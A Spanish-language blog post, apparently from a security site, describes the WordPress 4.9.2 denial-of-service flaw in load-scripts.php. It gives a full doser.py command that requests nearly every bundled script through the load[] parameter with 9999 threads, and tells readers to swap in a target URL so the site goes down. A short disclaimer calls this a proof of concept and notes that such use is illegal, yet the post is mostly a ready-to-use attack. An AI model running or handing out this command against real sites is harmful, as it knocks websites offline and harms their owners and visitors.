Vulnerabilidad ataque DoS a Wordpress 4.9.2

doser dos wordpress

Vulnerabilidad DoS en Wordpress


Como todos sabéis en rekat.es no tenemos afán de lucrarnos o hacer que otros se lucren a través de vulnerabilidades tan críticas como la que vamos a mencionar en este post.

Esta vulnerabilidad fue sacada en España a través del CERTSI el 6/2/2018 y lo que dice no es ni más ni menos que han encontrado una vulnerabilidad en un archivo de wordpress por la cuál un atacante puede hacer una denegación de servicio (DoS) en el mismo, dejando el sitio inutilizado y lo peor es que con esa actualización que ha hecho wordpress han deshabilitado las actualizaciones automáticas por lo tanto si no lo hace uno a mano el sitio web se queda tal cual. Esto es una putada ya que si los administradores no está atentos, millones de sitios creados en wordpress tienen un serio problema.

Para comprobar si dicha vulnerabilidad afecta a nuestro sitio web vamos a usar una herramienta mencionada con anterioridad llamada doser.

A estas alturas todos ya sabemos como funciona doser.py por lo tanto vamos a comprobar que nuestro sitio es vulnerable, abrimos el terminal, nos dirigimos hasta la carpeta donde tenemos ubicado doser y ponemos lo siguiente:
 python doser.py -g 'http://www.example.com/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 9999
Sustituimos la url y le damos a enter, él solo y dependiendo de nuestra conexión tumbará el sitio o no.
Cabe destacar que esto sólo hay que usarlo como prueba de concepto ya que este tipo de usos son totalmente ilegales, por lo tanto no se puede uno aprovechar de una vulnerabilidad no corregida.

Recordar que estamos abiertos a todo tipo de correcciones.

Para más info puedes consultarnos en nuestro email info@rekat.es o a través de nuestra página web https://rekat.es


Saludos! 👾

Comentarios

Entradas populares de este blog

Analizando metadatos con Metagoofil

Fotografía forense con Fotoforensics